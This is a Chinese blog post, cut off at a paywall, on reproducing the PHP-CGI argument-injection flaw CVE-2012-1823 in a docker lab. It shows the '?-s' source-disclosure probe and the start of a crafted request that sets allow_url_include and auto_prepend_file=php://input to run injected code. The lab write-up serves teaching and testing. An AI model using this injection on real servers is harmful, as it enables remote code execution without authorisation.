前言
这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。
CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。
复现
在相应的漏洞环境中输入
docker-compose up -d
生成环境
访问:http://your-ip:8080

环境成功搭建了,接下了去复现。
访问http://your-ip:8080/index.php?-s

可以看到爆出了代码,证明漏洞存在的
抓包构造数据包
GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.104.157:8080
Cache-Control: max-age=</
CVE-2012-1823漏洞复现指南

本文详细介绍了CVE-2012-1823漏洞,该漏洞允许攻击者的querystring参数成为php-cgi的输入,导致代码执行。通过复现过程,包括CGI概念的解释,以及在特定环境中输入特定命令来触发漏洞,展示了漏洞的可行性。
最低0.47元/天 解锁文章
905

被折叠的 条评论
为什么被折叠?



